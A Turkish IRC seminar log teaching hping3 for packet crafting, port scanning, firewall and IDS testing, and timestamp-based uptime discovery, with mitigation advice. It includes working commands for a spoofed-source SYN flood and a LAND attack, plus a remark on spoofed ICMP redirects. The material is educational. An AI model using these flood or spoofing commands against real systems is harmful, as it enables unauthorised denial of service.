"Hping ile tcp/ip oyunlari" (Huzeyfe ONAL) http://netsec.huzeyfe.net

huzeyfe_onal 3...[21:07-07/13] huzeyfe_onal 2... huzeyfe_onal 1 huzeyfe_onal Hepiniz hosgeldiniz arkadaslar. huzeyfe_onal Once kisaca sunumun neler icerdiginden bahsedecegim huzeyfe_onal sonra icerikteki konulara yavas yavas deginecegim. huzeyfe_onal Arada anlasilmayan yerler olursa sorularinizi alabiliriz ama konu disi sorulariniza konuyu dagitmamak icin cevap veremeyecegim. huzeyfe_onal Konu: Hping ile TCP/IP Oyunlari huzeyfe_onal Kisaca kendimi tanitayim adet yerini bulsun. huzeyfe_onal Huzeyfe ONAL/Istanbul/GSM Firmasinda bilgi guvenligi uzmani olarak calisiyor/www.lifeoverip.net huzeyfe_onal Sunumu olusturmak icin neler kullandim[21:10-07/13] huzeyfe_onal Redhat Linux huzeyfe_onal Hping3 huzeyfe_onal tcpdump/Wireshark huzeyfe_onal Snort huzeyfe_onal OpenBSD PF, Windows XP huzeyfe_onal Hping Nedir?[21:11-07/13] huzeyfe_onal basitce tanimlayacak olursak : Hping, istenilen türde TCP/IP paketleri oluşturmak için kullanılan harikulade bir araçtır huzeyfe_onal bilindigi uzere internet denen ve bizimde hergun kullandigimiz yapi tamamen TCP/IP uzerine bina edilmis. ---------------------------------------------------------------------------------------------- Soru: alee linux bilmeyenlerin durmasinda da yarar varmi alee yoksa bisi anlamazlar mi c1982 :)[21:13-07/13] alee pardon ama sormaliyim huzeyfe_onal Linux'dan bagimsiz. ----------------------------------------------------------------------------------------------- huzeyfe_onal . Oluşturulacak paketlerde tüm alanları kendimize özgü belirlenebilmesi, dinleme modu ile hostlara arası dosya transferi ve komut çalıştırma özelliği(Truva ati?), IDS/IPS testleri için özel veri alanı belirtilebilmesi(ids imzalarinin testi) gibi ileri düzey özelliklere sahiptir. huzeyfe_onal kisaca hping ile tcp/ip kullanan aglarda istedigimiz herseyi yapabiliriz.[21:14-07/13] huzeyfe_onal hatta TCP 'de veri aktarimi icin 3 lu el sıkısma gereklidir gibi klasik sınırları da asacagız. huzeyfe_onal Nasıl Edinebilirim? huzeyfe_onal Linux kullaniyorsaniz zaten bir sekilde nasil kuracaginizi biliyorsunuzdur. huzeyfe_onal windows sistemeler icin sitesinden binary paketleri indirip direkt komut satirindan calistirabilirsiniz.[21:15-07/13] huzeyfe_onal hping'in arabirimi var midir? huzeyfe_onal Benim bildigim yok, gerek de yok! huzeyfe_onal zira amac tvp/ip yapisini daha iyi ogrenmek, tcp/ip uzerine bina edilmis uygulamalari test etmek. Bu da oyle point &click uygulamalar ile olmaz huzeyfe_onal Temel Hping Kullanımı huzeyfe_onal ping denildiginde aklimiza icmp paketleri geliyor. huzeyfe_onal Oysa hping'in boyle bir kısıtlaması yok. Icmp paketleri hping'in sadece bir kismini olusturuyor. huzeyfe_onal Hping kullanarak ilk paketimizi gönderelim.[21:17-07/13] huzeyfe_onal # hping 192.168.1.1 huzeyfe_onal HPING 192.168.1.1 (eth0 192.168.1.1): NO FLAGS are set, 40 headers + 0 data bytes huzeyfe_onal Ctrl^C huzeyfe_onal --- 192.168.1.1 hping statistic --- huzeyfe_onal 3 packets tramitted, 0 packets received, 100% packet loss huzeyfe_onal round-trip min/avg/max = 0.0/0.0/0.0 ms huzeyfe_onal paket gönderdiğimiz sistemde tcpdump ile dinleyecek olursak su paketleri goruruz. huzeyfe_onal Tcpdump Çıktısı huzeyfe_onal # tcpdump -i eth0 -tttnn tcp port 0 huzeyfe_onal huzeyfe_onal IP 192.168.1.5.1894 > 192.168.1.1.0: . win 512 huzeyfe_onal IP 192.168.1.5.1895 > 192.168.1.1.0: . win 512 huzeyfe_onal Öntanımlı olarak hping icmp yerine TCP paketlerini kullanır. Boş(herhangi bir bayrak set edilmemiş) bir tcp paketini hedef sistemin 0 portuna gönderir.[21:18-07/13] huzeyfe_onal böylece ilk paketimizi göndermiş olduk. huzeyfe_onal Tabi bu pakete cevap alabileceğiniz herhangi bir host yoktur. huzeyfe_onal Varsayılan durumda hping TCP paketleri üretir fakat kabiliyeti sadece bunla sınırlı değildir.[21:19-07/13] huzeyfe_onal İstenirse tamamen özelleştirilebilen Raw IP paketleri, icmp ve udp paketleri de oluşturulabilir. huzeyfe_onal Hping Çalışma Modları huzeyfe_onal hping -0 / --rawip || Raw ip paketleri kullanmak için huzeyfe_onal hping --rawip parametresi (ek parametrelerle desteklenmeli) ham ip paketleri olusturur. huzeyfe_onal ne tur ip paketleri olusturulabilir? huzeyfe_onal http://www.iana.org/assignments/protocol-numbers huzeyfe_onal adresten alınacak protokl numaralari ile istenilen türde ip paketi oluştuırabiliriz. huzeyfe_onal Diger bir modda huzeyfe_onal --icmp 'dir[21:21-07/13] huzeyfe_onal hping ile ICMP paketleri ğretmek için kullanılır huzeyfe_onal -2 --udp UDP Paketleri oluşturmak için. huzeyfe_onal -8 –scan Klasik Tarama modu. huzeyfe_onal port taramada daha sekilli cıktılar almak için --scan parametresi ise yariyor. huzeyfe_onal son bir mod daha kaldi sonra aksiyona gececegiz:) huzeyfe_onal -9 –listen Dinleme modu[21:22-07/13] huzeyfe_onal Gecenlerde netsec listesinde gecen 9 puanlik altin sorunun cevabi bu parametrede yatiyor.. huzeyfe_onal TCP Paketleri ile Oynamak huzeyfe_onal Bir TCP paketinde hangi alanlar vardır, öncelikle buna biraz değinelim sonra hping ile tcp başlığındaki alanlar ile oynayarak neler yapabiliyoruz görelim. -------------------------------------------------------------------------------------------------- Soru: hasan_ boluyorom ama buna neden ihtiyac duyulurki? huzeyfe_onal neye? huzeyfe_onal --listen mi? hasan_ paketlerle oynamaya huzeyfe_onal :) hasan_ amac firewallı mı yanlıtmak c1982 :o) Doing! :D huzeyfe_onal isiniz sadece router yonetmek , firewalla kural eklemek degilse huzeyfe_onal ara sira router/firewall/ips lerinizin gercekten denildigi gibi calisip calismadigini kontrol edebilirsiniz.[21:24-07/13] huzeyfe_onal TCP protokolunu detayli ogrenmek isteyebilirsiniz. huzeyfe_onal kotu niyetli olabilirsiniz:D QWERT123 yihahaha :D -------------------------------------------------------------------------------------------------- huzeyfe_onal TCP oturumunda en önemli bileşen bayrak(flags)lardır huzeyfe_onal bayrak konusunu kavrayanin yolu duzdur:[21:25-07/13] huzeyfe_onal Oturumun kurulması, veri aktarımı, bağlantının koparılması vb gibi işlerin tamamı bu bayraklar aracılığı ile yapılır. huzeyfe_onal İnceleyeceğimiz diğer protokollerde(IP, ICMP, UDP) bayrak tanımı yoktur. huzeyfe_onal hep duydugunuz tcp daha guvenirlidir sozu bu bayraklardan gelir.[21:26-07/13] huzeyfe_onal hemen klasik bir bilgi girelim araya: huzeyfe_onal TCP oturumunda veri aktarımı için ne gereklidir? huzeyfe_onal Iki host arasinda veri aktarimi yapmak icin. huzeyfe_onal oncelikle bu iki hostun ortak bazi paydalarda bulusmasi gerekir. huzeyfe_onal nedir bunlar.[21:27-07/13] huzeyfe_onal tek sefer alabilecekleri veri miktari, sunucunun musait olup olmadigi vs huzeyfe_onal SYN -- SYN/ACK-- ACK paketleri huzeyfe_onal ile kurulan oturum sonrasi veri aktarimi guvenli olarak baslar. [21:28-07/13] huzeyfe_onal biraz sonra bu bilginin eksik oldugunu gorecegiz:) huzeyfe_onal Hping ile oturumu kurmak icin gerekli olan SYN bayraklı bir paket olusturalim. huzeyfe_onal # hping -S 192.168.1.1[21:29-07/13] huzeyfe_onal HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes huzeyfe_onal len=46 ip=192.168.1.1 ttl=255 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=2.5 ms huzeyfe_onal hedef sistemin 0. portuna SYN bayraklı bir paket gönderdik huzeyfe_onal ve cevap olarak RST/ACK paketi döndü huzeyfe_onal bu nedir? huzeyfe_onal kapalı bir porta gönderilen SYN paketine dönen cevap [21:30-07/13] huzeyfe_onal herhangi bir kapalı TCP portuna SYN bayraklı paket gönderirsek bu cevabı alırız. huzeyfe_onal hedef sistemde tcpdump calistiracak olursak donen paketi görebiliriz huzeyfe_onal # tcpdump -i eth0 -ttttnn tcp and host 192.168.1.1 huzeyfe_onal huzeyfe_onal 2007-07-05 19:44:30.096849 IP 192.168.1.4.2244 > 192.168.1.1.0: S 2019758107:2019758107(0) win 512 huzeyfe_onal hping -c parametresi ile kullanılmazsa hping durdurulana kadar(CTRL^c) paket göndermeye devam eder, –c ile kaç adet paket göndereceği belirtilir. huzeyfe_onal yani unutup giderseniz siz gelene kadar paket göndermeye devam eder. huzeyfe_onal RST Bayraklı TCP paketleri oluşturmak huzeyfe_onal # hping -R -c 1 192.168.1.1[21:32-07/13] huzeyfe_onal Benzer şekilde –R yerine diğer TCP bayrak tipleri konularak istenilen türde TCP paketi oluşturulabilir. huzeyfe_onal kac cesit bayrak vardır huzeyfe_onal 6+2 huzeyfe_onal Hping'de Port Belirtimi huzeyfe_onal -p parametresi kullanılarak hedef sisteme gönderilen paketlerin hangi porta gideceği belirtilir. Default olarak bu değer 0 dır. [21:33-07/13] huzeyfe_onal oluşturulan paketlerde kaynak portu değiştirmek istersek huzeyfe_onal eski stil calisan(non stateful) bazi cihazlari denetlemek icin [21:34-07/13] huzeyfe_onal kaynak ipyi bilindik bir port yapip paketleri gönderebiliriz. huzeyfe_onal -s parametresi ile kaynak TCP portu değiştirilebilir. öntanımlı olarak bu değer rastgele atanır. huzeyfe_onal ortaya karisik bir paket olusturup hedefe gönderelim. huzeyfe_onal 1000. porta RST, FIN, PUSH ve SYN bayrakları set edilmiş paket gönderimi huzeyfe_onal nasıl olsa engelleyen yok , bayraklar da ucretsiz:) huzeyfe_onal # hping -RFSP -c 3 192.168.1.1 -p 1000[21:35-07/13] huzeyfe_onal HPING 192.168.1.1 (eth0 192.168.1.1): RSFP set, 40 headers + 0 data bytes huzeyfe_onal Yine hedef sistemden donen cevaplari izleyecek olursak huzeyfe_onal # tcpdump -i eth0 -ttttnn tcp port 1000 and host 192.168.1.1 huzeyfe_onal 2007-07-05 19:54:19.670625 IP 192.168.1.4.2740 > 192.168.1.1.1000: SFRP 508587781:508587781(0) win 512 huzeyfe_onal Hping taramalarının IDS'ler tarafından yakalanması. huzeyfe_onal hping'in raw paketler olusturdugunu soylemistik. huzeyfe_onal isletim sistemindeki uygulamaların olusturdugu paketler ile tarama programlarının olusturdugu paketler farklı olabiliyor. [21:37-07/13] huzeyfe_onal Hping taramalarının IDS'ler tarafından yakalanması. demistik. huzeyfe_onal aslinda isini bilen birini yakalamasi oldukca guc huzeyfe_onal ama hping'i direkt kullanan birini IDS'ler cabuk yakalar huzeyfe_onal ICMP tarafina geciyorum[21:40-07/13] huzeyfe_onal biraz daha teorik bilgilerle devam edecegiz sonra surpriz sanatcilari davet edecegim:D huzeyfe_onal ICMP Paketleri ile Oynamak huzeyfe_onal icmp paketi olusturmak icin --icmp kullaniyoruz. huzeyfe_onal istenilen turde icmp paketi olusturabiliriz[21:41-07/13] huzeyfe_onal icmp'de tcp/udp gibi port kavrami yok huzeyfe_onal bunun yerine icmp type ve icmp code kavramlari var. huzeyfe_onal Klasik ping paketi(icmp echo request) olusturalim. huzeyfe_onal # hping --icmp 192.168.1.1 -c 1 huzeyfe_onal HPING 192.168.1.1 (eth0 192.168.1.1): icmp mode set, 28 headers + 0 data bytes huzeyfe_onal len=46 ip=192.168.1.1 ttl=255 id=25683 icmp_seq=0 rtt=2.6 ms huzeyfe_onal icmp type ve code degerleri o icmp paketinin ne ise yaradigini belirtir[21:42-07/13] huzeyfe_onal bazi icmp type'lari ek olarak code degerlerine de sahiptir. huzeyfe_onal mesela İcmp type 3 mesajı "Destination Unreachable" manasina gelir[21:43-07/13] huzeyfe_onal ama burda bir eksiklik var huzeyfe_onal destination ne? unreachable ne? huzeyfe_onal hedef sistem mi ulasilamaz , hedef port mu vs* huzeyfe_onal iste burda icmp code degerleri devreye girerek tanimlari acik hale getiriyor. huzeyfe_onal eger code 0 ise huzeyfe_onal Net Unreachable huzeyfe_onal code 1 ise host ulasilamaz huzeyfe_onal ya da 3 ise port ulasilamaz manasina gelir. huzeyfe_onal yukarıda port ulasılamazsa icmp paketi döner dedik? huzeyfe_onal bu UDP protokolü için geçerlidir[21:46-07/13] huzeyfe_onal UDP de bayrak tanımı olmadığı içim işlerini icmp'ye havale eder. huzeyfe_onal kisacasi kapali bir sisteme gonderilen udp paketi icmp ile cevap doner. huzeyfe_onal Örnek: huzeyfe_onal kapali oldugunu bildigimiz bir porta udp paketi gonderelim. huzeyfe_onal ve hedef sistemde firewall olmadigini varsayalim. huzeyfe_onal # hping --udp 192.168.1.1 -p 9000 -n -c 1 huzeyfe_onal paketimiz 9000 udp portuna gitti. huzeyfe_onal tcpdump ile ilgili arabirimi dinleyecek olursak huzeyfe_onal # tcpdump -i eth0 -ttttnn udp or icmp and host 192.168.1.1 huzeyfe_onal asagidaki ciktiyi aliriz.[21:48-07/13] huzeyfe_onal 2007-07-05 20:15:49.368744 IP 192.168.1.4.2548 > 192.168.1.1.9000: UDP, length 0 huzeyfe_onal 2007-07-05 20:15:49.369452 IP 192.168.1.1 > 192.168.1.4: ICMP 192.168.1.1 udp port 9000 unreachable, length 36 huzeyfe_onal hping ciktisi da benzer mesaji verecektir. huzeyfe_onal hping-test ~ # hping --udp 192.168.1.1 -p 9000 -n huzeyfe_onal HPING 192.168.1.1 (eth0 192.168.1.1): udp mode set, 28 headers + 0 data bytes huzeyfe_onal ICMP Port Unreachable from ip=192.168.1.1 huzeyfe_onal icmp ile ilgili olarak olusturulacak paketlerde[21:49-07/13] huzeyfe_onal type ve code değerleri belirlenebilir demiştik huzeyfe_onal bunlari huzeyfe_onal -C / --icmptype type huzeyfe_onal K / --icmpcode code ile belirleyebiliriz.[21:50-07/13] huzeyfe_onal mesela sahte icmp redirect mesaji olusturarak agda herhangi birisinin gateway olarak sizi gormesi huzeyfe_onal ve sizin uzerinizde paketleri gondermesi saglanabilir huzeyfe_onal ama bu cok ayip bisi :)[21:51-07/13] huzeyfe_onal Port Tarama aracı olarak Hpingü huzeyfe_onal port tarama araclari ne yapar? huzeyfe_onal cesitli turde tcp/udp/ip/icmp paketleri olusturarak hedef sistemlere gonderir ve gelen cevai yorumlarlar huzeyfe_onal hping ile istedigimiz ozellikde paket olusturabildigimize gore hpnig de bir port tarama aracidir diyebiliriz. [21:52-07/13] huzeyfe_onal hem de en alasindan :) huzeyfe_onal Port Tarama aracı olarak Hping huzeyfe_onal nmap kullananlar bilirler huzeyfe_onal standart kabul edilmis cesitli port tarama yontemleri vardir huzeyfe_onal connect scan huzeyfe_onal stealth scan[21:53-07/13] huzeyfe_onal xmas scan vs huzeyfe_onal bunlarin hepsi paketlerle oynayarak yapilir. huzeyfe_onal mesela yari acik tarama yapalim huzeyfe_onal # hping -S 192.168.1.1 -p ++22 huzeyfe_onal HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes huzeyfe_onal len=46 ip=192.168.1.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=5840 rtt=6.2 ms huzeyfe_onal len=46 ip=192.168.1.1 ttl=64 DF id=0 sport=23 flags=SA seq=1 win=5840 rtt=0.9 ms huzeyfe_onal len=46 ip=192.168.1.1 ttl=255 DF id=0 sport=24 flags=RA seq=2 win=0 rtt=0.8 ms huzeyfe_onal acik portlar icin SA, kapali portlar icin RA cevaplari dondu. huzeyfe_onal dikkate değer bir parametrede ++ dir.[21:54-07/13] huzeyfe_onal ++port_numarasi kullanarak her seferinde port numarasının bir artmasını sağladık huzeyfe_onal Biraz detaya girelim. huzeyfe_onal SYN Tarama İncelemesi huzeyfe_onal I) Hping hedef sisteme SYN bayraklı paket gönderir. huzeyfe_onal II) Hedef sistem SYN bayraklı paketi alır ve uygun TCP paketini (SYN/ACK bayraklı ) cevap olarak döner. huzeyfe_onal III) Paket gönderen (hping çalıştıran ) taraftaki işletim sistemi böyle bir paket beklemediği için dönen SYN/ACK bayraklı TCP paketine RST cevabı döner. huzeyfe_onal port taramalarda daha düzenli çıktı almak istenirse --scan parametresi de kullanılabilir.[21:55-07/13] huzeyfe_onal Oyle ya bu sekilde hangi portun acik hangisinin kapali oldugunu ekrani izleyerek anlamak sıkıcı olur huzeyfe_onal # hping --scan 21,22,23,80,110,130-143 -S 194.27.72.88 huzeyfe_onal --scan ile tarama modunu aktif ettik huzeyfe_onal sonuna da portlari istedigimiz gibi ekledik[21:56-07/13] huzeyfe_onal 23-30 demek huzeyfe_onal 23 ve 30 arasi. huzeyfe_onal ciktisi nasil olur? huzeyfe_onal Scanning 194.27.72.88 (194.27.72.88), port 21,22,23,80,110,130-143 huzeyfe_onal 19 ports to scan, use -V to see all the replies huzeyfe_onal +----+-----------+---------+---+-----+-----+-----+ huzeyfe_onal |port| serv name | flags |ttl| id | win | len | huzeyfe_onal +----+-----------+---------+---+-----+-----+-----+ huzeyfe_onal 21 ftp : .S..A... 56 52428 65535 46 huzeyfe_onal 22 ssh : .S..A... 56 52684 65535 46 huzeyfe_onal 80 http : .S..A... 56 52940 65535 46 huzeyfe_onal 110 pop3 : .S..A... 56 53196 65535 46 huzeyfe_onal All replies received. Done. huzeyfe_onal Not responding ports: (130 cisco-fna) (131 cisco-tna) (132 cisco-sys) (133 statsrv) (134 ingres-net) (135 loc-srv) (136 profile) (137 netbios-ns) (138 netbios-dgm) (139 netbios-ssn) (140 emfis-data) (141 emfis- cntl) (142 bl-idm) (143 imap) huzeyfe_onal eh! biraz daha duzgun, en azindan hangi port acik hangisi kapali ozet var. huzeyfe_onal SYN Scan/FIN Scan/Null Scan/Xmas Tarama Çeşitleri [21:57-07/13] huzeyfe_onal Xmas Scan Örneği huzeyfe_onal Bu tarama tipinde amaç hedef sisteme FIN/URG/PSH bayrakları set edilmiş TCP paketleri göndererek huzeyfe_onal Kapali sistemler için RST/ACK huzeyfe_onal Açık sistemler için cevap dönmemesini beklemektir. huzeyfe_onal hping le bu tarama turunu gercekleyelim.[21:58-07/13] huzeyfe_onal # hping -FUP 192.168.1.2 -p 90 -n -c 1 huzeyfe_onal HPING 192.168.1.2 (eth0 192.168.1.2): FPU set, 40 headers + 0 data bytes huzeyfe_onal len=46 ip=192.168.1.2 ttl=222 id=37083 sport=90 flags=RA seq=0 win=0 rtt=5.3 ms huzeyfe_onal --- 192.168.1.2 hping statistic --- huzeyfe_onal 1 packets tramitted, 1 packets received, 0% packet loss huzeyfe_onal round-trip min/avg/max = 5.3/5.3/5.3 ms huzeyfe_onal goruldugu gibi kapali port icin RST/ACK dondu huzeyfe_onal Sorular varsa sorulari alip ikinci kisma geciyorum[21:59-07/13] -------------------------------------------------------------------------------------------------- Soru: erdemB rst/ack döndüğünü cevap gelmesinden mi anlıyoruz. AliAkgun netsec listesinde geçen 9 puanlýk sorunun cevabý 9 --listen modunda yatýyor demiþtiniz. Soru nedir?[22:00-07/13] huzeyfe_onal :) listenin gecmisine bakabilirsiniz. AliAkgun ok huzeyfe_onal erdemB: kapali port icin RA cevabi donuyor. huzeyfe_onal cevap gelmezse ya port aciktir ya da firewall engelliyordur. [22:01-07/13] -------------------------------------------------------------------------------------------------- Soru: cybervolkan Hocam Bolu'dan sevgiler... --scan ile port taramasını hangi tarama tipi ile yapıyor? --scan anahtarına tarama tipi belirtebiliyor muyuz?[22:03-07/13] huzeyfe_onal --scan sadece ciktilari daha ozet bir sekilde veriyor. [22:04-07/13] QWERT123 olur huzeyfe_onal yani tarama turunu yine biz bayraklarla(TCP icin) belirliyoruz huzeyfe_onal mesela FIN scan icin huzeyfe_onal hping --scan -F hedef_sistem -p port_numarasi huzeyfe_onal diyebiliriz. cybervolkan hmm anladım örnekteki -S anahtarını kaçırmışım teşekkürler [22:05-07/13] -------------------------------------------------------------------------------------------------- Soru: erdemB nmapdan farklı olarak sys scan/connect scan/xmas scan/null scan buralarda ne gibi değişiklikler yapılır ve null scan ı açıklayacakmısınız sonraki bölümde huzeyfe_onal null scan= bos bayrakli TCP paketleri huzeyfe_onal hping'e hicbir parametre vermezseniz null scan yapar. huzeyfe_onal hping hedef_sistem -p 80 huzeyfe_onal gibi. huzeyfe_onal isimlere pek takilmamak lazim:) huzeyfe_onal isterseniz sizde kendinize ozgu tarama tipleri olusturup isim verebilirsiniz.[22:07-07/13] -------------------------------------------------------------------------------------------------- huzeyfe_onal Firewall Testleri huzeyfe_onal Bir firewall neden test edilir? Daha dogrusu nesi test edilir? huzeyfe_onal bir cirpida aklima gelenler huzeyfe_onal ip spoofing'e karsi onlem alinmis mi? huzeyfe_onal yani spoof edilmis paketleri iletiyormu/geciriyor mu? huzeyfe_onal performansi nedir? huzeyfe_onal kurallari gercekten yazildigi gibi isliyor mu[22:09-07/13] huzeyfe_onal kendisine ait ne gibi bilgiler veriyor huzeyfe_onal ne zaman reboot edildigi, calistigi isletim sistemi, bulundugu ag maskesi vs huzeyfe_onal hping ile ip spoofing testleri yapmak icin -a parametresini kullaniyoruz. huzeyfe_onal -a --spoof hostname[22:10-07/13] huzeyfe_onal onumuzde bir firewall var nat/routing yapiyor. huzeyfe_onal biz firewallun disinda bir yere kaynak ip adresi spoof edilmis paketler gonderiyoruz. huzeyfe_onal bu paketler firewallu geciyorsa bir eksiklik var demektir. [22:11-07/13] huzeyfe_onal # hping -a 100.100.100.1 192.168.1.3 -S -p 80 huzeyfe_onal ggibi. huzeyfe_onal oldukca masum gorunen bu istek biraz daha gelistirilirse huzeyfe_onal cok can yakabilir nasil mi? [22:12-07/13] huzeyfe_onal hping'in sagladigi random kaynak ip /hedef ip olusturma ozelligi ile huzeyfe_onal random kaynak ip olusturmak icin: --rand-source huzeyfe_onal random hedef ip olusturmak icin --rand-dest huzeyfe_onal mesela hping ile syn flood denemesi yapalim.[22:13-07/13] huzeyfe_onal arada sorular varsa teker teker alabiliriz. huzeyfe_onal ne demistik SYN Flood olusturabiliriz huzeyfe_onal syn flood'da amac nedir? -------------------------------------------------------------------------------------------------- Soru: Crone -a dest ip midir huzeyfe_onal -a kaynak ip huzeyfe_onal hedef ip icin birsey belirtmiyoruz.[22:14-07/13] Crone 1.3? alee spoof ediyo huzeyfe_onal kaynak ip adresini 100.100.100.1 olarak set ettik huzeyfe_onal hedef ip adresi de 192.... li olan Crone ok. got it.. Crone go on... -------------------------------------------------------------------------------------------------- huzeyfe_onal Syn flood'da /bir nevi D/DOS) saldırılarında amaç olabildiğince fazla sayıda ve olabildiğince farklı kaynaktan hedef sisteme paketler göndererek kapasitesini doldurmasını ve yeni bağlantı kabul etmemesini sağlamaktır[22:15-07/13] huzeyfe_onal atiyorum hedef sistemin es zamanli paket tutma sayisi 10000 olsun. huzeyfe_onal ben her biri farkli iplerden geliyormus gibi bu kadar paketi sisteme gonderirsem hedef sapitir ve yeni baglanti kabul etmez [22:16-07/13] huzeyfe_onal uzerinde ids/ips/idp ne calisirsa calissin cok fazla yapabilecegi birsey yoktur. huzeyfe_onal Zira kimi yasaklayacak? huzeyfe_onal tum ipler spoof edilmis. huzeyfe_onal flood icin kullanilan diger bir protokolde udp die huzeyfe_onal dir. huzeyfe_onal ona sonra gelecegiz.[22:17-07/13] huzeyfe_onal basit bir syn flood yapalim. huzeyfe_onal # hping -S --rand-source 192.168.1.3 -p 445 -I eth0 --flood huzeyfe_onal hedef sistemimiz 445. portu acik bir windows. huzeyfe_onal biraz bekleyelim huzeyfe_onal hattan dusersem bilinki sistemim cakildi:D huzeyfe_onal HPING 192.168.1.3 (eth0 192.168.1.3): S set, 40 headers + 0 data bytes huzeyfe_onal hping in flood mode, no replies will be shown huzeyfe_onal evet %12 lerdeki cpu oranim[22:19-07/13] huzeyfe_onal oldu %60 huzeyfe_onal biraz daha zorlarsam ya da bir makine ile daha yaparsam tamamen gidecek. huzeyfe_onal ayni komutu Linux sistemlere yapacak olursak cpu orani %20leri asmayacaktir bu ornek icin. huzeyfe_onal hafta sonu guvenlik egitimlerinde test edip onaylanmistir:) -------------------------------------------------------------------------------------------------- Soru: hasan_ sebep? huzeyfe_onal sebep huzeyfe_onal Linux/UNIX sistemlerin default olarak syn_flood'a karsi korumali gelmesi. huzeyfe_onal Windows sistemlerde bu sonradan yapilandirilabiliyor. huzeyfe_onal http://blog.lifeoverip.net/index.php/2007/07/09/windows-sistemlere-guvenlik-dopingi/ huzeyfe_onal adresinde Windows sistemleri daha sıkı hale getirmek icin mini tavsiyeler var -------------------------------------------------------------------------------------------------- Soru: erdemB spoof u biraz açıklaya bilirmisiz(kaynağı nerden buluyoruz veya nasl spoof yapıyoruz) huzeyfe_onal spoof paketler nasil olusturulu?[22:21-07/13] huzeyfe_onal detayini netten bakalim, detaya girersek zaman alacak. -------------------------------------------------------------------------------------------------- huzeyfe_onal LAND Atağı huzeyfe_onal LAND atağında amaç hedef sisteme kendi ip adresinden geliyormış gibi paketler göndererek kısır döngüye girmesini sağlamaktır. WinNT sistemlerde oldukça başarılı olan bu atak türü günümüzdeki çoğu sistemde çalışmaz. huzeyfe_onal bu arada ne kadar hizli yazdigimida gormus oldunuz:D huzeyfe_onal Atağın nasıl çalıştığını daha iyi anlamak ve izlemek için hping ile aşağıdaki komutu çalıştırıp Windows sistemde durumu izleyin. huzeyfe_onal #hping -a 192.168.1.4 192.168.1.4 -S -p 22 --flood huzeyfe_onal HPING 192.168.1.4 (eth0 192.168.1.4): S set, 40 headers + 0 data bytes[22:22-07/13] huzeyfe_onal --- 192.168.1.4 hping statistic --- huzeyfe_onal 10 packets tramitted, 0 packets received, 100% packet loss huzeyfe_onal round-trip min/avg/max = 0.0/0.0/0.0 ms huzeyfe_onal artik cogu sistemde bu atak yemiyor huzeyfe_onal peki bu atağı bir IDS(saldiri tespit sistemine) yaparsak bize ne der? huzeyfe_onal tail -f /var/log/snort/alert huzeyfe_onal [**] [116:151:1] (snort decoder) Bad Traffic Same Src/Dst IP [**] huzeyfe_onal 07/12-20:14:52.750771 192.168.1.4:2587 -> 192.168.1.4:22 huzeyfe_onal TCP TTL:64 TOS:0x0 ID:56230 IpLen:20 DgmLen:40 huzeyfe_onal ******S* Seq: 0x781CB8BE Ack: 0x5ACC9778 Win: 0x200 TcpLen: 20 huzeyfe_onal [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] huzeyfe_onal [Classification: Potentially Bad Traffic] [Priority: 2] huzeyfe_onal 07/12-20:14:52.750771 192.168.1.4:2587 -> 192.168.1.4:22 huzeyfe_onal TCP TTL:64 TOS:0x0 ID:56230 IpLen:20 DgmLen:40 huzeyfe_onal ******S* Seq: 0x781CB8BE Ack: 0x5ACC9778 Win: 0x200 TcpLen: 20 huzeyfe_onal [Xref => http://www.cert.org/advisories/CA-1997-28.html][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0016][Xref => http://www.securityfocus.com/bid/2666] huzeyfe_onal hemen tanidi! huzeyfe_onal BAD-TRAFFIC same SRC/DST kismina dikkat.[22:23-07/13] huzeyfe_onal Hedef Sistemler Hakkında Bilgi Edinmek huzeyfe_onal ilk örnek uptime süresi huzeyfe_onal Hedef Sistemin Uptime Süresi Belirleme huzeyfe_onal # hping3 -S --tcp-timestamp -p 80 -c 2 194.27.72.88 [22:24-07/13] huzeyfe_onal HPING 194.27.72.88 (eth0 194.27.72.88): S set, 40 headers + 0 data bytes huzeyfe_onal len=56 ip=194.27.72.88 ttl=56 DF id=28012 sport=80 flags=SA seq=0 win=65535 rtt=104.5 ms huzeyfe_onal TCP timestamp: tcpts=55281816 huzeyfe_onal len=56 ip=194.27.72.88 ttl=56 DF id=28013 sport=80 flags=SA seq=1 win=65535 rtt=99.1 ms huzeyfe_onal TCP timestamp: tcpts=55281917 huzeyfe_onal HZ seems hz=100 huzeyfe_onal System uptime seems: 6 days, 9 hours, 33 minutes, 39 seconds huzeyfe_onal System uptime seems: 6 days, 9 hours, 33 minutes, 39 seconds -------------------------------------------------------------------------------------------------- Soru: alee neden hedef sistemin uptime bilgisine erismek isteriz ki? huzeyfe_onal :) bilmem . Mesela kotu adam bir yere saldirmistir huzeyfe_onal saldirisinin basariya ulasip sistemin coktugunu anlamak icin boyle bisiler gonderebilir[22:25-07/13] alee ooo evet super huzeyfe_onal cok daha farkli amaclar icin de kullanilabilir -------------------------------------------------------------------------------------------------- huzeyfe_onal ek not: huzeyfe_onal Windows XP SP2’lerle birlikte güvenlik amaçlı* timestamp sorgularına cevap dönmez. huzeyfe_onal :) -------------------------------------------------------------------------------------------------- Soru: talkieee erisimi nasil engelleyebiliriz? baskasi gormesin? huzeyfe_onal Cisco Routerlarda timestamp’i aşağıdaki şekilde aktif/pasif hale getirebiliriz huzeyfe_onal ip tcp timestamp -> aktif hale getirmek için huzeyfe_onal no ip tcp timestamp de tam tersi icin. huzeyfe_onal Linux icin huzeyfe_onal # sysctl -a|grep timestamp huzeyfe_onal net.ipv4.tcp_timestamps = 1 talkieee ha saol talkieee bu netcraft filan ordanmi goruyor huzeyfe_onal evet.[22:27-07/13] huzeyfe_onal diyebiliriz huzeyfe_onal baska yolu var mi ben bilmiyorum. ..... huzeyfe_onal linuX2da timestamp engelleme huzeyfe_onal echo 0 >/proc/sys/net/ipv4/tcp_timestamps[22:32-07/13] huzeyfe_onal yaparsak uptime suresi gorunmez olur ..... -------------------------------------------------------------------------------------------------- Soru: alee # hping -S --rand-source 192.168.1.3 -p 445 -I eth0 --flood normalde bunu bi firewall'a uygularsak ve firewall'in hicbir portu acik diilse ise yarar mi[22:28-07/13] huzeyfe_onal yaramaz huzeyfe_onal zdenilebilir huzeyfe_onal cok sayida gonderip mesgul edebilir firewallu alee peki normalde firewall lar bole bi saldiriya nasil engel oluyolar huzeyfe_onal zira geriye rst paketi donecektir her istek icin alee yani herhangibir porttan 